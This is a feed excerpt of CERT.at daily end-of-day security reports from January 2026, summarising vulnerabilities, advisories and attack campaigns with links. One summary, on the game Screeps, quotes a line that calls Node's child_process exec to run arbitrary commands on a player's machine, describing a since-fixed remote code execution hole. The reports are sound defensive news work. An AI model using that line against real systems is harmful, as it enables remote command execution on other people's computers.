An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] in FortiOS, FortiManager, FortiAnalyzer may allow an attacker with a FortiCloud account and a registered device to log into other devices registered to other accounts, if FortiCloud SSO authentication is enabled on those devices.
&lt;p /&gt;
&lt;A HREF=&quot;https://fortiguard.fortinet.com/psirt/FG-IR-26-060&quot;&gt;https://fortiguard.fortinet.com/psirt/FG-IR-26-060&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;SolarWinds warns of critical Web Help Desk RCE, auth bypass flaws&lt;/h3&gt;

SolarWinds has released security updates to patch critical authentication bypass and remote command execution vulnerabilities in its Web Help Desk IT help desk software.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/&quot;&gt;https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Two High-Severity n8n Flaws Allow Authenticated Remote Code Execution&lt;/h3&gt;

Cybersecurity researchers have disclosed two new security flaws in the n8n workflow automation platform, including a crucial vulnerability that could result in remote code execution.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/two-high-severity-n8n-flaws-allow.html&quot;&gt;https://thehackernews.com/2026/01/two-high-severity-n8n-flaws-allow.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Critical vm2 Node.js Flaw Allows Sandbox Escape and Arbitrary Code Execution&lt;/h3&gt;

A critical sandbox escape vulnerability has been disclosed in the popular vm2 Node.js library that, if successfully exploited, could allow attackers to run arbitrary code on the underlying operating system. The vulnerability, tracked as CVE-2026-22709, carries a CVSS score of 9.8 out of 10.0 on the CVSS scoring system.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/critical-vm2-nodejs-flaw-allows-sandbox.html&quot;&gt;https://thehackernews.com/2026/01/critical-vm2-nodejs-flaw-allows-sandbox.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Network management solution HPE Aruba Fabric Composer is vulnerable&lt;/h3&gt;

Attackers can attack systems running HPE Aruba Networking Fabric Composer with malicious code.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Netzwerkmanagementloesung-HPE-Aruba-Fabric-Composer-ist-angreifbar-11156836.html&quot;&gt;https://www.heise.de/news/Netzwerkmanagementloesung-HPE-Aruba-Fabric-Composer-ist-angreifbar-11156836.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;A critical GnuPG security update&lt;/h3&gt;

There is a new GnuPG update for a &quot;critical security bug&quot; in recent GnuPG releases. A crafted CMS (S/MIME) EnvelopedData message carrying an oversized wrapped session key can cause a stack buffer overflow in gpg-agent during the PKDECRYPT --kem=CMS handling. This can easily be used for a DoS but, worse, the memory corruption can very likely also be used to mount a remote code execution attack. The bug was introduced while changing an internal API to the FIPS required KEM API.
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1056209/&quot;&gt;https://lwn.net/Articles/1056209/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Wednesday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (java-1.8.0-openjdk), Debian (openssl), Fedora (assimp, chromium, curl, freerdp, gimp, and harfbuzz), Mageia (glibc, haproxy, iperf, and python-pyasn1), Red Hat (image-builder, openssl, and osbuild-composer), Slackware (mozilla), SUSE (avahi, cups, gio-branding-upstream, google-osconfig-agent, java-11-openjdk, java-17-openjdk, java-21-openjdk, kernel-firmware, libmatio-devel, libopenjp2-7, nodejs22, php8, python-python-multipart, python311-urllib3_1, qemu, and xen), and Ubuntu (ffmpeg, jaraco.context, openssl, and openssl, openssl1.0).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1056330/&quot;&gt;https://lwn.net/Articles/1056330/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security Vulnerabilities fixed in Thunderbird 140.7.1&lt;/h3&gt;

CSS-based exfiltration of the content from partially encrypted emails when allowing remote content.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.mozilla.org/en-US/security/advisories/mfsa2026-08/&quot;&gt;https://www.mozilla.org/en-US/security/advisories/mfsa2026-08/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;[R1] Tenable Network Monitor Version 6.5.3 Fixes Multiple Vulnerabilities&lt;/h3&gt;

Nessus Network Monitor leverages third-party software to help provide underlying functionality. Several of the third-party components (libxml2, libxslt, expat, c-ares, curl, sqlite) were found to contain vulnerabilities, and updated versions have been made available by the providers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.tenable.com/security/tns-2026-02&quot;&gt;https://www.tenable.com/security/tns-2026-02&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Notification about the vulnerability in beat-access for Windows - Privilege Escalation Risk&lt;/h3&gt;

A vulnerability has been identified in beat-access for Windows, a remote access software provided as part of the beat service, which may allow malicious code to be executed from the local environment. At the time of posting this notice, no attacks exploiting this vulnerability have been confirmed. However, we strongly recommend that customers using beat-access for Windows promptly update to the latest version (4.0.0 or later).
&lt;p /&gt;
&lt;A HREF=&quot;https://www.fujifilm.com/fbglobal/eng/company/news/notice/2026/0127_announce.html&quot;&gt;https://www.fujifilm.com/fbglobal/eng/company/news/notice/2026/0127_announce.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CVE-2025-60021 (CVSS 9.8): Command injection in Apache bRPC heap profiler&lt;/h3&gt;

CVE-2025-60021, a critical command injection issue in Apache bRPC's /pprof/heap profiler endpoint, was identified during broader analysis of diagnostic and debugging surfaces in the framework.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cyberark.com/resources/threat-research-blog/cve-2025-60021-cvss-9-8-command-injection-in-apache-brpc-heap-profiler&quot;&gt;https://www.cyberark.com/resources/threat-research-blog/cve-2025-60021-cvss-9-8-command-injection-in-apache-brpc-heap-profiler&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Chrome: Stable Channel Update for Desktop&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;http://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_27.html&quot;&gt;http://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_27.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Johnson Controls Products&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-04&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-04&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Festo Didactic SE MES PC&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-02&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-02&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;iba Systems ibaPDA&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-01&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-01&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Schneider Electric Zigbee Products&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-03&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-03&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-28T19:17:19Z</dc:date></entry><entry><title>Tageszusammenfassung - 27.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-27012026"/><author><name>CERT.at</name></author><updated>2026-01-27T18:19:10Z</updated><published>2026-01-27T18:19:10Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Monday 26-01-2026 18:00 - Tuesday 27-01-2026 18:00
Handler:     Guenes Holler
Co-Handler:  Alexander Riepl


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Over 6,000 SmarterMail servers exposed to automated hijacking attacks&lt;/h3&gt;

Nonprofit security organization Shadowserver has found over 6,000 SmarterMail servers exposed online and likely vulnerable to attacks exploiting a critical authentication bypass vulnerability.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/over-6-000-smartermail-servers-exposed-to-automated-hijacking-attacks/&quot;&gt;https://www.bleepingcomputer.com/news/security/over-6-000-smartermail-servers-exposed-to-automated-hijacking-attacks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Nike investigates data breach after extortion gang leaks files&lt;/h3&gt;

Nike is investigating what it described as a &quot;potential cyber security incident&quot; after the World Leaks ransomware gang leaked 1.4 TB of files allegedly stolen from the sportswear giant.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/nike-investigates-data-breach-after-extortion-gang-leaks-files/&quot;&gt;https://www.bleepingcomputer.com/news/security/nike-investigates-data-breach-after-extortion-gang-leaks-files/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft issues emergency patch: Office users are being attacked via zero-day vulnerability&lt;/h3&gt;

A dangerous security vulnerability affects all common Office versions. Given the active exploitation, users should patch promptly.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/microsoft-bringt-notfallpatch-office-nutzer-werden-ueber-zero-day-luecke-attackiert-2601-204646.html&quot;&gt;https://www.golem.de/news/microsoft-bringt-notfallpatch-office-nutzer-werden-ueber-zero-day-luecke-attackiert-2601-204646.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Attacks observed: ancient telnetd vulnerability endangers hundreds of thousands of systems&lt;/h3&gt;

For more than ten years, attackers have been able to gain root access to countless devices via Telnet. New scans show the extent.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/attacken-beobachtet-uralte-telnetd-luecke-gefaehrdet-hunderttausende-systeme-2601-204656.html&quot;&gt;https://www.golem.de/news/attacken-beobachtet-uralte-telnetd-luecke-gefaehrdet-hunderttausende-systeme-2601-204656.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Bypassing Windows Administrator Protection&lt;/h3&gt;

A headline feature introduced in the latest release of Windows 11, 25H2, is Administrator Protection. The goal of this feature is to replace User Account Control (UAC) with a more robust and, importantly, securable system to allow a local user to access administrator privileges only when necessary. This blog post will give a brief overview of the new feature, how it works and how it's different from UAC. I'll then describe some of the security research I undertook while it was in the ..
&lt;p /&gt;
&lt;A HREF=&quot;https://projectzero.google/2026/26/windows-administrator-protection.html&quot;&gt;https://projectzero.google/2026/26/windows-administrator-protection.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns&lt;/h3&gt;

Kaspersky researchers analyze updated CoolClient backdoor and new tools and scripts used in HoneyMyte (aka Mustang Panda or Bronze President) APT campaigns, including three variants of a browser data stealer.
&lt;p /&gt;
&lt;A HREF=&quot;https://securelist.com/honeymyte-updates-coolclient-uses-browser-stealers-and-scripts/118664/&quot;&gt;https://securelist.com/honeymyte-updates-coolclient-uses-browser-stealers-and-scripts/118664/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Canva among ~100 targets of ShinyHunters Okta identity-theft campaign&lt;/h3&gt;

Atlassian, RingCentral, ZoomInfo also among tech targets. ShinyHunters has targeted around 100 organizations in its latest Okta single sign-on (SSO) credential stealing campaign, according to researchers and the criminal group itself.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/01/26/shinyhunters_okta_sso_campaign/&quot;&gt;https://www.theregister.com/2026/01/26/shinyhunters_okta_sso_campaign/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Threat actors use FortiCloud SSO bypass to collect LDAP connection passwords&lt;/h3&gt;

CERT.at gained access to a toolkit of an unknown threat actor targeting FortiCloud SSO bypass in Fortinet appliances (CVE-2025-59718/CVE-2025-59719). We are releasing under TLP:CLEAR key findings about likely post-exploitation goals of the attacker. The obtained exploit works only for the original vulnerability [1] and is not effective against patched ..
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cert.at/en/blog/2026/1/threat-actors-use-forticloud-to-collect-ldap-connection-passwords&quot;&gt;https://www.cert.at/en/blog/2026/1/threat-actors-use-forticloud-to-collect-ldap-connection-passwords&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Russian security systems firm Delta hit by cyberattack, services disrupted&lt;/h3&gt;

Building and car alarm systems managed by Russian company Delta have been disrupted by a cyberattack blamed on a &quot;hostile foreign state.&quot;
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/russia-delta-security-alarm-company-cyberattack&quot;&gt;https://therecord.media/russia-delta-security-alarm-company-cyberattack&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Clawdbot: an open-source AI assistant - cool and a security disaster&lt;/h3&gt;

Until now, AI services such as ChatGPT, Gemini etc. have dominated the field of LLMs - and bots build on top of these LLMs. Peter Steinberger and his team have built an open-source bot, Clawdbot, which runs locally and offers interfaces to various services and models ..
&lt;p /&gt;
&lt;A HREF=&quot;https://borncity.com/blog/2026/01/26/clawdbot-ein-opensource-ki-assistent/&quot;&gt;https://borncity.com/blog/2026/01/26/clawdbot-ein-opensource-ki-assistent/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088&lt;/h3&gt;

The Google Threat Intelligence Group (GTIG) has identified widespread, active exploitation of the critical vulnerability CVE-2025-8088 in WinRAR, a popular file archiver tool for Windows, to establish initial access and deliver diverse payloads. Discovered and patched in July 2025, government-backed threat actors linked to Russia and China as well as financially motivated threat actors continue to exploit this n-day across disparate operations. The consistent exploitation method, a ..
&lt;p /&gt;
&lt;A HREF=&quot;https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability/&quot;&gt;https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Apache Hadoop: bug in the HDFS native client lets malicious code through&lt;/h3&gt;

The Apache Hadoop framework is vulnerable. Attacks can take place in the context of the HDFS file system. A security patch is available.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11155241&quot;&gt;https://heise.de/-11155241&lt;/a&gt;

&lt;hr&gt;


&lt;h2&gt; Vulnerabilities &lt;/h2&gt;



&lt;h3&gt;DSA-6112-1 openjdk-21 - security update&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lists.debian.org/debian-security-announce/2026/msg00021.html&quot;&gt;https://lists.debian.org/debian-security-announce/2026/msg00021.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;DSA-6111-1 imagemagick - security update&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lists.debian.org/debian-security-announce/2026/msg00020.html&quot;&gt;https://lists.debian.org/debian-security-announce/2026/msg00020.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security Vulnerabilities fixed in Firefox 147.0.2&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.mozilla.org/en-US/security/advisories/mfsa2026-06/&quot;&gt;https://www.mozilla.org/en-US/security/advisories/mfsa2026-06/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Kubernetes Remote Code Execution Via Nodes/Proxy GET Permission&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://grahamhelton.com/blog/nodes-proxy-rce&quot;&gt;https://grahamhelton.com/blog/nodes-proxy-rce&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-27T18:19:10Z</dc:date></entry><entry><title>Tageszusammenfassung - 26.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-26012026"/><author><name>CERT.at</name></author><updated>2026-01-26T18:59:21Z</updated><published>2026-01-26T18:59:21Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Friday 23-01-2026 18:00 - Monday 26-01-2026 18:00
Handler:     Michael Schlagenhaufer
Co-Handler:  Guenes Holler


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Hackers can bypass npm's Shai-Hulud defenses via Git dependencies&lt;/h3&gt;

The defense mechanisms that NPM introduced after the Shai-Hulud supply-chain attacks have weaknesses that allow threat actors to bypass them via Git dependencies. [..]  the vulnerabilities were discovered in multiple utilities in the JavaScript ecosystem that allow managing dependencies, like pnpm, vlt, Bun, and NPM. [..] They say that the problems were addressed in all tools except for NPM, who closed the report stating that the behavior &quot;works as expected.&quot;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/hackers-can-bypass-npms-shai-hulud-defenses-via-git-dependencies/&quot;&gt;https://www.bleepingcomputer.com/news/security/hackers-can-bypass-npms-shai-hulud-defenses-via-git-dependencies/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Nearly 800,000 Telnet servers exposed to remote attacks&lt;/h3&gt;

Internet security watchdog Shadowserver tracks nearly 800,000 IP addresses with Telnet fingerprints amid ongoing attacks exploiting a critical authentication bypass vulnerability in the GNU InetUtils telnetd server.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/nearly-800-000-telnet-servers-exposed-to-remote-attacks/&quot;&gt;https://www.bleepingcomputer.com/news/security/nearly-800-000-telnet-servers-exposed-to-remote-attacks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Konni Hackers Deploy AI-Generated PowerShell Backdoor Against Blockchain Developers&lt;/h3&gt;

As recently as this month, Konni has been observed distributing spear-phishing emails containing malicious links that are disguised as harmless advertising URLs associated with Google and Naver's advertising platforms to bypass security filters and deliver a remote access trojan codenamed EndRAT. [..] The email messages have been found to masquerade as financial notices, such as transaction confirmations or wire transfer requests, to trick recipients into downloading ZIP archives hosted on WordPress sites. The ZIP file comes with a Windows shortcut (LNK) that's designed to execute an AutoIt script disguised as a PDF document.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/konni-hackers-deploy-ai-generated.html&quot;&gt;https://thehackernews.com/2026/01/konni-hackers-deploy-ai-generated.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malicious VS Code AI Extensions with 1.5 Million Installs Steal Developer Source Code&lt;/h3&gt;

Cybersecurity researchers have discovered two malicious Microsoft Visual Studio Code (VS Code) extensions that are advertised as artificial intelligence (AI)-powered coding assistants [..] The extensions, which have 1.5 million combined installs and are still available for download from the official Visual Studio Marketplace, are listed below - ChatGPT - *** [..] ChatGPT - ChatMoss
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/malicious-vs-code-ai-extensions-with-15.html&quot;&gt;https://thehackernews.com/2026/01/malicious-vs-code-ai-extensions-with-15.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;BitLocker: Microsoft hands keys over to law enforcement&lt;/h3&gt;

Anyone who encrypts their hard disk or SSD should be able to assume that only they can decrypt it again. With Microsoft's BitLocker encryption technology, however, this does not necessarily appear to be the case, because in the Home edition of Windows the company automatically stores the key in the user's online account.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Microsoft-gibt-BitLocker-Schluessel-an-Strafverfolgungsbehoerden-11152988.html&quot;&gt;https://www.heise.de/news/Microsoft-gibt-BitLocker-Schluessel-an-Strafverfolgungsbehoerden-11152988.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft SharePoint/OneDrive: IDCRL authentication ends as of 31 Jan. 2026 - OpenID Connect and OAuth are coming (MC1184649)&lt;/h3&gt;

Microsoft is retiring the IDCRL authentication protocol for the online versions on 31 January 2026. Authentication will then take place via OpenID Connect and OAuth, but can still be switched back for a few more weeks. Microsoft already announced the change in November 2025 and, as a reminder, posted it again on 20 January 2026 in the Microsoft 365 Message Center under MC1184649 - Microsoft SharePoint: Retirement of IDCRL authentication protocol and enforcement of OpenID Connect and OAuth protocols.
&lt;p /&gt;
&lt;A HREF=&quot;https://borncity.com/blog/2026/01/25/microsoft-sharepoint-onedrive-idcrl-authentication-endet-ab-31-jan-2026-openid-connect-und-oauth-kommt-mc1184649/&quot;&gt;https://borncity.com/blog/2026/01/25/microsoft-sharepoint-onedrive-idcrl-authentication-endet-ab-31-jan-2026-openid-connect-und-oauth-kommt-mc1184649/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;$6,000 &quot;Stanley&quot; Toolkit Sold on Russian Forums Fakes Secure URLs in Chrome&lt;/h3&gt;

Varonis researchers discovered that Stanley uses a clever trick of disguising itself as a simple note-taking tool called Notely. Once a person installs it, the app can display a fake login page directly over a real website. [..] What is most concerning for the average user is that this toolkit isn't just a piece of software but a full-featured service. The most expensive version comes with a guarantee that the malicious app will pass the official security checks of the Chrome Web Store.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/stanley-toolkit-russia-forum-fakes-chrome-urls/&quot;&gt;https://hackread.com/stanley-toolkit-russia-forum-fakes-chrome-urls/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;New Fake CAPTCHA Scam Abuses Microsoft Tools to Install Amatera Stealer&lt;/h3&gt;

Blackpoint Cyber discovered a new Fake CAPTCHA campaign that tricks users into installing Amatera Stealer. By abusing legitimate Microsoft scripts and hiding malicious code in Google Calendar and PNG images, this attack bypasses standard security to harvest private passwords and browser data.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/fake-captcha-scam-microsoft-tools-amatera-stealer/&quot;&gt;https://hackread.com/fake-captcha-scam-microsoft-tools-amatera-stealer/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;F5: K000159681: Credential harvesting campaign targeting F5 VPN users&lt;/h3&gt;

On January 13, 2026, researchers identified a large-scale credential harvesting campaign targeting several VPN providers, including F5. The threat actors behind the campaign registered numerous doppelgänger domains designed to mimic legitimate F5 domains. These domains are used to deceive victims into downloading counterfeit BIG-IP VPN client installers. [..] IOCs, C2 servers, and the malicious script hash value
&lt;p /&gt;
&lt;A HREF=&quot;https://my.f5.com/manage/s/article/K000159681&quot;&gt;https://my.f5.com/manage/s/article/K000159681&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Screeps: How a game about programming exposed thousands of players to remote code execution&lt;/h3&gt;

In Screeps (short for &quot;Scripting Creeps&quot;), you cannot click on a unit (&quot;creep&quot;) and tell it what to do. If you place a building on the map, your builders will stand next to it and do nothing. There are no buttons to give your creeps instructions. Instead, you must write code to define their behavior. [..] In Multiplayer Screeps worlds, all of the code to progress the game runs on the server, including the AI for your units. [..] Screeps is on Steam, and the native client reuses the browser code but with no sandboxing. nw.require('child_process').exec('your command here') will get you full command line access to the target machine. [..] It is fixed now, which was the primary goal of my writing this.
&lt;p /&gt;
&lt;A HREF=&quot;https://outsidetheasylum.blog/screeps/&quot;&gt;https://outsidetheasylum.blog/screeps/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The end of the curl bug-bounty&lt;/h3&gt;

There is no longer a curl bug-bounty program. It officially stops on January 31, 2026. [..] We saw an explosion in AI slop reports combined with a lower quality even in the reports that were not obvious slop - presumably because they too were actually misled by AI but with that fact just hidden better. [..] The never-ending slop submissions take a serious mental toll to manage and sometimes also a long time to debunk.
&lt;p /&gt;
&lt;A HREF=&quot;https://daniel.haxx.se/blog/2026/01/26/the-end-of-the-curl-bug-bounty/&quot;&gt;https://daniel.haxx.se/blog/2026/01/26/the-end-of-the-curl-bug-bounty/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Hands-Free Lockpicking: Critical Vulnerabilities in dormakaba's Physical Access Control System&lt;/h3&gt;

In this post, Clemens Stockenreitner and Werner Schober of the SEC Consult Vulnerability Lab highlight several critical vulnerabilities found in dormakaba's physical access control systems based on exos 9300. This access control system originates from the manufacturer's enterprise product line for door and access systems and is predominantly used by large enterprises in Europe, including industrial and service companies, logistics operators, energy providers, and airport operators.
&lt;p /&gt;
&lt;A HREF=&quot;https://sec-consult.com/blog/detail/hands-free-lockpicking-critical-vulnerabilities-in-dormakabas-physical-access-control-system/&quot;&gt;https://sec-consult.com/blog/detail/hands-free-lockpicking-critical-vulnerabilities-in-dormakabas-physical-access-control-system/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Monday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (gimp, glib2, go-toolset:rhel8, golang, java-17-openjdk, java-21-openjdk, kernel, net-snmp, pcs, and thunderbird), Debian (apache2, imagemagick, incus, inetutils, libuev, openjdk-17, php7.4, python3.9, shapelib, taglib, and zvbi), Fedora (mingw-glib2, mingw-harfbuzz, mingw-libsoup, mingw-openexr, pgadmin4, python3.11, python3.12, python3.9, and wireshark), Gentoo (Asterisk, Commons-BeanUtils, GIMP, inetutils, and Vim, gVim), Mageia (kernel), Oracle (glib2, java-17-openjdk, java-21-openjdk, and libpng), Red Hat (java-17-openjdk, java-21-openjdk, kernel, and kernel-rt), SUSE (azure-cli-core, bind, buildah, chromium, coredns, glib2, harfbuzz, kernel, kernel-firmware, libheif, libvirt, openCryptoki, openvswitch, podman, python, python-urllib3, rabbitmq-server, and vlang), and Ubuntu (cjson).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1055958/&quot;&gt;https://lwn.net/Articles/1055958/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Beckhoff Security Advisory 2025-003: Vulnerabilities in Beckhoff Device Manager&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2025-003.pdf&quot;&gt;https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2025-003.pdf&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-26T18:59:21Z</dc:date></entry><entry><title>Tageszusammenfassung - 23.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-23012026"/><author><name>CERT.at</name></author><updated>2026-01-23T18:25:27Z</updated><published>2026-01-23T18:25:27Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Thursday 22-01-2026 18:00 - Friday 23-01-2026 18:00
Handler:     Guenes Holler
Co-Handler:  Michael Schlagenhaufer


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Analysis of Single Sign On (SSO) abuse on FortiOS&lt;/h3&gt;

Fortinet product security has identified the issue, and the company is working on a fix to remediate this occurrence. An advisory will be issued as the fix scope and timeline is available. It is important to note that while, at this time, only exploitation of FortiCloud SSO has been observed, this issue is applicable to all SAML SSO implementations. In the meantime, Fortinet recommends taking the mitigating actions described below.
&lt;p /&gt;
&lt;A HREF=&quot;https://feeds.fortinet.com/~/941387753/0/fortinet/blogs~Analysis-of-Single-Sign-On-SSO-abuse-on-FortiOS&quot;&gt;https://feeds.fortinet.com/~/941387753/0/fortinet/blogs~Analysis-of-Single-Sign-On-SSO-abuse-on-FortiOS&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Okta SSO accounts targeted in vishing-based data theft attacks&lt;/h3&gt;

Okta is warning about custom phishing kits built specifically for voice-based social engineering (vishing) attacks. BleepingComputer has learned that these kits are being used in active attacks to steal Okta SSO credentials for data theft.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/okta-sso-accounts-targeted-in-vishing-based-data-theft-attacks/&quot;&gt;https://www.bleepingcomputer.com/news/security/okta-sso-accounts-targeted-in-vishing-based-data-theft-attacks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Data leaks analysed: passwords users would do better to avoid&lt;/h3&gt;

Researchers examined around six billion passwords from several data leaks. Their report highlights patterns that occur particularly frequently.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/datenlecks-analysiert-solche-passwoerter-sollten-nutzer-besser-meiden-2601-204548.html&quot;&gt;https://www.golem.de/news/datenlecks-analysiert-solche-passwoerter-sollten-nutzer-besser-meiden-2601-204548.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Phishing Attack Uses Stolen Credentials to Install LogMeIn RMM for Persistent Access&lt;/h3&gt;

Cybersecurity researchers have disclosed details of a new dual-vector campaign that leverages stolen credentials to deploy legitimate Remote Monitoring and Management (RMM) software for persistent remote access to compromised hosts. [..] The attack unfolds in two distinct waves, where the threat actors leverage fake invitation notifications to steal victim credentials, and then leverage those pilfered credentials to deploy RMM tools to establish persistent access.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/phishing-attack-uses-stolen-credentials.html&quot;&gt;https://thehackernews.com/2026/01/phishing-attack-uses-stolen-credentials.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Crims compromised energy firms Microsoft accounts, sent 600 phishing emails&lt;/h3&gt;

Unknown attackers are abusing Microsoft SharePoint file-sharing services to target multiple energy-sector organizations, harvest user credentials, take over corporate inboxes, and then send hundreds of phishing emails from compromised accounts to contacts inside and outside those organizations. The attackers likely used previously-compromised email addresses to gain initial access to &quot;multiple&quot; energy-sector organizations targeted in this campaign, according to Redmond, which detailed the digital intrusions in a Wednesday report. 
&lt;p /&gt;
&lt;A HREF=&quot;https://go.theregister.com/feed/www.theregister.com/2026/01/22/crims_compromised_energy_firms_microsoft/&quot;&gt;https://go.theregister.com/feed/www.theregister.com/2026/01/22/crims_compromised_energy_firms_microsoft/&lt;/a&gt;

&lt;hr&gt;

